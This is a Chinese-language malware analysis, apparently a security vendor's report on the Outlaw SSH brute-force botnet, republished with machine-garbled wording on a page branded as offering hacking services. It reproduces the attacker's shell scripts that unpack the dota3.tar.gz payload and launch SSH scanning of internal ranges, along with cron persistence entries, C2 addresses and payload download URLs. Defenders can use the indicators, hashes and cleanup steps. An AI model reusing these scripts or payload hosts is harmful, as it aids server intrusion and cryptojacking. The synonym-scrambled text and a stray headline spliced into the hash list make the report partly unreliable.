黑客的英语，亡命徒（Outlaw）僵尸网络熏染约2万台Linux服务器，企业注重实时消灭-黑客业务

软件破解补丁隐藏窃密木马，毒害全球数百万网民

【文章摘要】腾讯平安威胁情报中心检测到海内大量企业遭遇亡命徒（Outlaw）僵尸网络攻击，已造成海内约2万台Linux服务器熏染。该僵尸网络最早于2018年被发现，其主要特征为通过SSH爆破攻击目的系统，同时流传基于Perl的Shellbot和门罗币挖矿木马。企业Linux服务器管理员应检查服务器资源占用情形，实时修改弱密码，制止被暴力破解。

一、靠山

腾讯平安威胁情报中心检测到海内大量企业遭遇亡命徒（Outlaw）僵尸网络攻击。亡命徒（Outlaw）僵尸网络最早于2018年被发现，其主要特征为通过SSH爆破攻击目的系统，同时流传基于Perl的Shellbot和门罗币挖矿木马。腾讯平安威胁情报中心平安大数据显示，亡命徒（Outlaw）僵尸网络已造成海内约2万台Linux服务器熏染，影响上万家企业。

此次攻击流传的母体文件为dota3.tar.gz，可能为亡命徒（Outlaw）僵尸网络的第3个版本，母体文件释放shell剧本启动对应二进制程序，kswapd0卖力举行门罗币挖矿，tsm32、tsm64卖力继续SSH爆破攻击流传病毒。

亡命徒（Outlaw）僵尸网络之前通过行使Shellshock破绽举行分发，因此被命名为“ Shellbot”。Shellbot行使物联网（IoT）装备和Linux服务器上的常见下令注入破绽举行熏染。Shellshock破绽(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的破绽，大多数Linux发行版通常会使用到该功效，攻击者可以在这些受影响的Linux服务器上远程执行代码。

亡命徒（Outlaw）僵尸网络行使SSH爆破入侵的攻击流动，可以被腾讯T-Sec高级威胁检测系统（御界）检测到：

腾讯T-Sec云防火墙可以检测亡命徒（Outlaw）僵尸网络的挖矿行为、Shellshock破绽行使及暴力破解SSH登录口令等等攻击流动。

现在，Outlaw僵尸网络的影响仍在扩散，对企业服务器危害严重，腾讯电脑管家支持检测亡命徒（Outlaw）僵尸网络的攻击流动，辅助企业用户实时发现平安危急。

二、样本剖析

Outlaw通过SSH爆破攻击，接见目的系统并下载带有shell剧本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到，根目录rsync下存放初始化剧本，a目录下存放shellbot后门，b目录下存放挖矿木马，c目录下存放SSH爆破攻击程序。

C目录下二进制文件tsm32、tsm64为SSH（22端口）扫描和爆破程序，并可以通过执行远程命名来下载和执行恶意程序。

爆破乐成后执行base64编码的shell下令，主要功效为删除旧版本的恶意程序和目录，然后解压获取到的最新版本恶意程序并执行，内容如下：

下令1：

#!/bin/bash

cd /tmp

rm -rf .ssh

rm -rf .mountfs

rm -rf .X13-unix

rm -rf .X17-unix

rm -rf .X19-unix

rm -rf .X2*

mkdir .X25-unix

cd .X25-unix

mv ar/tmp/dota3.tar.gz dota3.tar.gz

tar xf dota3.tar.gz

sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1&

sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm

exit 0

下令2：

#!/bin/bash

cd /tmp

rm -rf .ssh

rm -rf .mountfs

rm -rf .X13-unix

rm -rf .X17-unix

rm -rf .X19-unix

rm -rf .X2*

mkdir .X25-unix

cd .X25-unix

mv ar/tmp/dota3.tar.gz dota3.tar.gz

tar xf dota3.tar.gz

sleep 3s && cd /tmp/.X25-unix/.rsync/c

nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&

sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&

sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&

exit 0

还会通过远程下令修改SSH公钥以便之后能更容易入侵。

B目录下run剧本主要内容为base64编码的shellbot后门程序，解码后可以看到代码仍然经由混淆。

把执行函数eval改为print可打印出解密后的代码，是基于Perl的Shellbot变种，毗邻C2服务器地址为45.9.148.99:443，能够执行多个后门下令，包罗文件下载、执行shell cmd和DDoS攻击。若是接受到扫描端口下令，可针对以下端口举行扫描："21","22","23","25","53","80","110","143","6665"。

A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。在初始化阶段会执行剧本init0来找到大量Linux平台竞品挖矿木马并举行消灭。

在当前用户目录下建立/.configrc目录，拷贝a、b文件夹到该目录下并执行初始化剧本，然后通过写入cron.d安装计划义务举行持久化。写入准时义务如下：

11*/2**$dir2/a/upd>/dev/null2>&1
@reboot$dir2/a/upd>/dev/null2>&1
58**0$dir2/b/sync>/dev/null2>&1
@reboot$dir2/b/sync>/dev/null2>&1
00*/3**$dir/c/aptitude>/dev/null2>&1

三、管家平安建议

建议企业Linux服务器管理员检查服务器资源占用情形，实时修改弱密码，制止被暴力破解。若发现服务器已被入侵安装挖矿木马，可参考以下步骤手动检查、消灭：

1、删除以下文件，杀死对应历程：

/tmp/*-unix/.rsync/a/kswapd0

*/.configrc/a/kswapd0

md5: 84945e9ea1950be3e870b798bd7c7559

永恒之蓝下载器最新变种重启EXE文件攻击，新变种已感染1.5万台服务器

/tmp/*-unix/.rsync/c/tsm64

md5: 4adb78770e06f8b257f77f555bf28065

/tmp/*-unix/.rsync/c/tsm32

md5: 10ea65f54f719bffcc0ae2cde450cb7a

2、检查cron.d中是否存在包罗以下内容的准时义务，若有举行删除：

/a/upd

/b/sync

/c/aptitude

IOCs

45.9.148.99

45.55.57.6

188.166.58.29

104.236.228.46

165.227.45.249

192.241.211.94

188.166.6.130

142.93.34.237

46.101.33.198

149.202.162.73

167.71.155.236

157.245.83.8

45.55.129.23

46.101.113.206

37.139.0.226

159.203.69.48

104.131.189.116

159.203.102.122

159.203.17.176

91.121.51.120

128.199.178.188

208.68.39.124

45.55.210.248

206.81.10.104

5.230.65.21

138.197.230.249

107.170.204.148

Md5

dota3.tar.gz

1a4592f48f8d1bf77895862e877181e0

kswapd0

84945e9ea1950be3e870b798bd7c7559

tsm64

4adb78770e06f8b257f77f555bf28065

tsm32

10ea65f54f719bffcc0ae2cde450cb7a

run

716e6b533f836cee5e480a413a84645a

URL

http[:]//45.55.57.6/dota3.tar.gz

http[:]//188.166.58.29/dota3.tar.gz

http[:]//104.236.228.46/dota3.tar.gz

http[:]//165.227.45.249/dota3.tar.gz

http[:]//192.241.211.94/dota3.tar.gz

http[:]//188.166.6.130/dota3.tar.gz

http[:]//142.93.34.237/dota3.tar.gz

http[:]//46.101.33.198/dota3.tar.gz

http[:]//149.202.162.73/dota3.tar.gz

http[:]//167.71.155.236/dota3.tar.gz

http[:]//157.245.83.8/dota3.tar.gz

http[:]//45.55.129.23/dota3.tar.gz

http[:]//46.101.113.206/dota3.tar.gz

http[:]//37.139.0.226/dota3.tar.gz

http[:]//159.203.69.48/dota3.tar.gz

http[:]//104.131.189.116/dota3.tar.gz

http[:]//159.203.102.122/dota3.tar.gz

http[:]//159.203.17.176/dota3.tar.gz

http[:]//91.121.51.120/dota3.tar.gz

http[:]//128.199.178.188/dota3.tar.gz

http[:]//208.68.39.124/dota3.tar.gz

http[:]//45.55.210.248/dota3.tar.gz

http[:]//206.81.10.104/dota3.tar.gz

http[:]//5.230.65.21/dota3.tar.gz

http[:]//138.197.230.249/dota3.tar.gz

http[:]//107.170.204.148/dota3.tar.gz

警惕BasedMiner挖矿木马爆破SQL弱口令入侵挖矿

« 2024年8月 »
一	二	三	四	五	六	日
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

黑客业务

黑客服务,入侵网站,网站入侵,黑客技术,信息安全,web安全

黑客的英语，亡命徒（Outlaw）僵尸网络熏染约2万台Linux服务器，企业注重实时消灭

一、靠山

IOCs